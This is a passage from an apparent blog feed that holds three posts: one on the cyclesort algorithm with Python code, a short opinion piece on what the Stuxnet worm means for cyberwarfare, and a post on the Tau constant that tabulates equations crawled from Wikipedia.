<strong>find_cycles<\/strong> function above. We keep track of\nelements that are already part of a cycle in the <strong>seen<\/strong> set, so that we can\nskip them as we proceed through the list. The <strong>seen<\/strong> set can be as large as\nthe list itself, so we've doubled the memory requirement for the algorithm. If\nwe're allowed to destroy the input list, we can avoid explicitly tracking seen\nelements by relocating elements to their correct position as we work our way\naround each cycle. All the cycles are disjoint and we traverse each cycle only\nonce, so doing this won't affect the function's output. We can then tell that\nwe need to skip an element we've already seen by checking whether it's in the\ncorrect sorted position. Here's the result:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> element<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> find_cycles2<\/span><span>(l):<\/span><\/span>\n<span class=\"giallo-l\"><span>    cycles<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> key(l[i]):<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycle<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span 
class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                cycle.append(n)<\/span><\/span>\n<span class=\"giallo-l\"><span>                tmp<\/span><span style=\"color: #D73A49;\"> =<\/span><span> l[n]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span>                last_value<\/span><span style=\"color: #D73A49;\"> =<\/span><span> tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(last_value)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycles.append(<\/span><span style=\"color: #005CC5;\">list<\/span><span>(<\/span><span style=\"color: #005CC5;\">reversed<\/span><span>(cycle)))<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> cycles<\/span><\/span><\/code><\/pre>\n<p>But... at the end of this process, the original list is sorted! Tada: cyclesort\npops out of the shrubbery almost as a side-effect of efficiently finding all\ncycles. 
If we're only interested in sorting, we can strip the code that saves\nthe cycles, which leaves us with a nice, pared-back sorting algorithm:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> element<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> cyclesort_simple<\/span><span>(l):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> key(l[i]):<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                tmp<\/span><span style=\"color: #D73A49;\"> =<\/span><span> l[n]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span>                last_value<\/span><span style=\"color: #D73A49;\"> =<\/span><span> tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>   
             n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(last_value)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span><\/code><\/pre>\n<p>The <strong>cyclesort_simple<\/strong> algorithm only works on permutations of sets of\nnumbers ranging from <strong>0<\/strong> to <strong>n<\/strong>. There are other fast ways to sort data of\nthis restricted kind, but all the methods I know of require additional memory\nproportional to <strong>n<\/strong>. Cyclesort can do it without any extra storage at all,\nwhich is a neat trick.<\/p>\n<h2 id=\"visualising-cyclesort\">Visualising cyclesort<\/h2>\n<p>At this point, we have enough information to visualise the algorithm, so let's\ntake a look at the beastie we're working with. I've had to make some little\nadjustments to the usual sortvis.org visualisation process to cope with\ncyclesort. In the algorithm above, the first element is duplicated into the\nsecond position of each cycle, and that duplicate remains in play until it's\nover-written by the last element of the cycle. I changed the algorithm slightly\nto write a null placeholder at the start of the cycle to avoid duplicates, and\ntaught the sortvis.org visualiser to deal with \"empty\" slots.  The resulting\n<a rel=\"external\" href=\"http:\/\/sortvis.org\/visualisations.html\">weave<\/a> visualisation looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"cyclesort.png\">\n        <img src=\"cyclesort.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This is quite satisfying - you can tell where each cycle begins and ends by the\ngaps, which span each cycle exactly. 
It's immediately clear that the\npermutation above, for instance, contained five cycles. Within each cycle, you\ncan follow along as each element replaces the next, until we finally close the\ngap by placing the last element in the first slot.<\/p>\n<p>The <a rel=\"external\" href=\"http:\/\/sortvis.org\/visualisations.html\">dense<\/a> visualisation is less\ninformative because the gaps are too small to see at a single-pixel width, and\nthe algorithm doesn't have much other large-scale structure. It still looks\nneat, though:<\/p>\n<div class=\"media\">\n    <a href=\"cyclesort-dense.png\">\n        <img src=\"cyclesort-dense.png\"  \/>\n    <\/a>\n\n    \n<\/div><h2 id=\"generalising-cyclesort\">Generalising cyclesort<\/h2>\n<p>Cyclesort works whenever we can write an implementation of the <strong>key<\/strong>\nfunction, so there's quite a bit of scope for clever exploitation of structured\ndata. The Haddon paper presents a solution for one common case: permutations\nwhose elements come from a relatively small set, where the number of occurrences\nof each element is known. 
The insight is that the <strong>key<\/strong> function can have\npersistent state, letting us calculate the positions of elements incrementally\nas we work through the list.<\/p>\n<p>We begin by adding an extra argument to our sort function: a list of <strong>(element,\ncount)<\/strong> tuples telling us a) the order of the keys, and b) the frequency with\nwhich each key occurs.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>[(<\/span><span style=\"color: #032F62;\">&quot;a&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 10<\/span><span>), (<\/span><span style=\"color: #032F62;\">&quot;b&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 33<\/span><span>), (<\/span><span style=\"color: #032F62;\">&quot;c&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 18<\/span><span>), (<\/span><span style=\"color: #032F62;\">&quot;d&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 41<\/span><span>)]<\/span><\/span><\/code><\/pre>\n<p>Now, in the sorted list, we know that there will be a contiguous block of 10\n\"a\"s, followed by a contiguous block of 33 \"b\"s, and so forth. 
We can use this\ninformation to calculate the offset of each contiguous block up front:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> offsets<\/span><span>(keys):<\/span><\/span>\n<span class=\"giallo-l\"><span>    d<\/span><span style=\"color: #D73A49;\"> =<\/span><span> {}<\/span><\/span>\n<span class=\"giallo-l\"><span>    offset<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 0<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> key, occurences<\/span><span style=\"color: #D73A49;\"> in<\/span><span> keys:<\/span><\/span>\n<span class=\"giallo-l\"><span>        d[key]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> offset<\/span><\/span>\n<span class=\"giallo-l\"><span>        offset<\/span><span style=\"color: #D73A49;\"> +=<\/span><span> occurences<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> d<\/span><\/span><\/code><\/pre>\n<p>The <strong>key<\/strong> function uses this offset dictionary to look up the current index\nfor any element. Each time we insert an element into position, we increment the\nrelevant offset entry - next time we get to an element of the same type, we\nwill place it in the next position in the contiguous block. We also make a\nsmall modification to the algorithm to cater for the progressive position\nincrement process: we start a cycle only when the element's current index is\nequal to or above the position where it ought to be. 
Here's a Python implementation:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> offsets<\/span><span>(keys):<\/span><\/span>\n<span class=\"giallo-l\"><span>    d<\/span><span style=\"color: #D73A49;\"> =<\/span><span> {}<\/span><\/span>\n<span class=\"giallo-l\"><span>    offset<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 0<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> key, occurences<\/span><span style=\"color: #D73A49;\"> in<\/span><span> keys:<\/span><\/span>\n<span class=\"giallo-l\"><span>        d[key]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> offset<\/span><\/span>\n<span class=\"giallo-l\"><span>        offset<\/span><span style=\"color: #D73A49;\"> +=<\/span><span> occurences<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> d<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(o, element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> o[element]<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> cyclesort_general<\/span><span>(l, keys):<\/span><\/span>\n<span class=\"giallo-l\"><span>    o<\/span><span style=\"color: #D73A49;\"> =<\/span><span> offsets(keys)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: 
#005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> &gt;=<\/span><span> key(o, l[i]):<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                tmp<\/span><span style=\"color: #D73A49;\"> =<\/span><span> l[n]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span>                last_value<\/span><span style=\"color: #D73A49;\"> =<\/span><span> tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(o, last_value)<\/span><\/span>\n<span class=\"giallo-l\"><span>                o[last_value]<\/span><span style=\"color: #D73A49;\"> +=<\/span><span style=\"color: #005CC5;\"> 1<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span><\/code><\/pre>\n<p>This algorithm runs in <strong>O(n + m)<\/strong>, where <strong>n<\/strong> is the number of elements and\n<strong>m<\/strong> is the number of distinct element values. 
In practice <strong>m<\/strong> is usually\nsmall, so this is often tantamount to being <strong>O(n)<\/strong>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>As usual, the code for these visualisations has been incorporated into the\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/sortvis\">sortvis project<\/a>. I've also added the\nvisualisations above to the <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> website.<\/p>\n"},{"title":"What Stuxnet means","published":"2010-11-15T00:00:00+00:00","updated":"2010-11-15T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/stuxnet\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/stuxnet\/","content":"<p><a rel=\"external\" href=\"http:\/\/www.symantec.com\/connect\/blogs\/stuxnet-breakthrough\">The last bit of evidence is now\nin<\/a> - it appears\nthat the mysterious <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Stuxnet\">Stuxnet<\/a> worm was\nindeed aimed at Iran's nuclear capability. This means that we now know for sure\nthat Stuxnet was an event of great significance - the first example of a type of\nsophisticated interstate warfare that we can expect to see a lot more of in\nfuture. It neatly ties together a number of trends that we've been talking about\nto clients at <a rel=\"external\" href=\"http:\/\/www.nullcube.com\">Nullcube<\/a> for years:<\/p>\n<ul>\n<li><strong>The worm as a targeted delivery platform.<\/strong> Stuxnet spread indiscriminately,\nwaiting until it infected its intended target before springing into action.\nThis is a marvelous delivery platform with excellent deniability. When\nexecuted with flair - using multiple previously unknown vulnerabilities,\nspreading through both physical media and networks - it can be incredibly hard\nto defend against. 
Look for a Stuxnet-like worm that exfiltrates data from\ntargeted systems next.<\/li>\n<li><strong>Internet security is a national concern.<\/strong> There's a tendency to view the\nInternet as an internationally homogeneous network.  Stuxnet makes it (even\nmore) clear that the Internet is a domain for contest between nation states,\nand that national differences in security readiness and technology populations\nmatter. Look for more direct government involvement in tracking and improving\nthe security of local networks. I suspect we'll also see the rise of national\nperimeter defenses in some countries in the next few years.<\/li>\n<li><strong>Embedded systems are a target.<\/strong> Embedded systems are everywhere, are often\nignored when security is considered, and are opaque, difficult to inspect, and\ndifficult to monitor. This is a malware nirvana. Whether they are directly or\nindirectly connected to a network, embedded systems are a target. My\nprediction: soon, we'll see a Stuxnet-like worm that spreads directly from\nembedded system to embedded system, most likely affecting DSL modems. In fact,\nwe've already seen a clumsy precursor of this in <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Psyb0t\">Psyb0t<\/a>, discovered at the beginning of 2009.<\/li>\n<\/ul>\n<p>There's a lot about this incident that we will most likely never know. We're\nunlikely to find out who's behind Stuxnet (although Israel and the US seem to\nbe the only real possibilities). We're unlikely to find out if Stuxnet ever\nrepaid the immense technological capital its creators invested. 
But we do know\nthat it's a sign of things to come.<\/p>\n"},{"title":"Tau: is it worth switching?","published":"2010-10-04T00:00:00+00:00","updated":"2010-10-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/maths\/tau\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/maths\/tau\/","content":"<p>The mailing list for my <a rel=\"external\" href=\"http:\/\/dunedin.linux.net.nz\/Main\/HomePage\">local LUG<\/a>\nrecently had a small flurry of posts on <a rel=\"external\" href=\"http:\/\/www.tauday.com\/\">The Tau\nManifesto<\/a>, a proposal to replace the constant \u03c0 with\n\u03c4, equal to 2\u03c0.  Pro- and anti- camps quickly emerged, and much beer will likely\nbe spilt over the issue at our next meeting.<\/p>\n<p>Disregarding for the moment any conceptual elegance or explanatory power that\nTau might have, I was interested to know if the move would really reduce\nredundancy in common mathematical expressions. Let's say (rather arbitrarily)\nthat Tau simplifies a mathematical expression whenever \u03c0 is preceded by an even\nconstant - that means that 2\u03c0 becomes \u03c4, and 4\u03c0 becomes 2\u03c4, and so forth. I had\na vague intuition that the majority of occurrences of \u03c0 in the wild fell into\nthis category, which might indicate that \u03c4 is a more natural (or at least\nparsimonious) constant to use.  Was my hunch right? This, I felt, was something\nI could quantify.<\/p>\n<h2 id=\"methodology\">Methodology<\/h2>\n<p>I wrote a small script to crawl all the articles linked to from the Wikipedia\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/List_of_equations\">List of Equations<\/a> page. For\neach page, I extracted all mathematical expressions, and checked the LaTeX\nsource of each for occurrences of the symbol \u03c0. A little bit of light parsing\nwas then done to check if the symbol was directly preceded by an integer\nconstant.  
Finally, I rendered the LaTeX source back to images to produce the\nequation tables below.<\/p>\n<p>Of course, anyone of sound judgement will disregard what follows entirely, due\nto the many obvious shortcomings of this procedure and its underlying\nassumptions.  Readers of my blog, on the other hand, may find the results\ninteresting.<\/p>\n<h2 id=\"results\">Results<\/h2>\n<p>I found a total of 3173 equations, of which 133 contained the symbol \u03c0. Of these\n133 equations, the distribution of constant factors preceding \u03c0 looked like\nthis:<\/p>\n<div class=\"media\">\n    <a href=\"taugraph.png\">\n        <img src=\"taugraph.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I call this a straight win for Tau - the vast majority of expressions using \u03c0\n(119 of 133) are preceded by even integer constants.<\/p>\n<h2 id=\"equations\">Equations<\/h2>\n<p>Below are all the expressions that included \u03c0, plus the detected constant\nfactor. The headings point to the Wikipedia pages from which the equations were\ntaken.<\/p>\n<p>If nothing else, this list is a nice reminder of the mysterious ubiquity of a\nconstant involving the diameter and circumference of a circle in all aspects of\nphysics and higher math.<\/p>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Relativistic_wave_equations\">Relativistic wave equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"1.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Sine-Gordon_equation\">Sine-Gordon equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"2.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n    
        <img src=\"3.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Fokker%E2%80%93Planck_equation\">Fokker\u2013Planck equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"4.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"5.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"6.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"7.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Euler%27s_equation\">Euler&#39;s equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"8.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Friedmann_equations\">Friedmann equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"9.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"10.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"11.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"12.png\"\/>\n      
  <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"13.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"14.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"15.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"16.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"17.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"18.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Vlasov_equation\">Vlasov equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"19.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"20.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"21.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Screened_Poisson_equation\">Screened Poisson equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"22.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td 
style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"23.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"24.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"25.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"26.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Quadratic_equation\">Quadratic equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"27.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"28.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Stokes-Einstein_relation\">Stokes-Einstein relation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">6<\/td>\n        <td>\n            <img src=\"29.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">6<\/td>\n        <td>\n            <img src=\"30.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">6<\/td>\n        <td>\n            <img src=\"31.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Fisher_equation\">Fisher equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" 
class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"32.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"33.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_odd\">None<\/td>\n        <td>\n            <img src=\"34.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"35.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Einstein%27s_field_equation\">Einstein&#39;s field equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"36.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"37.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"38.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"39.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"40.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"41.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"42.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n   
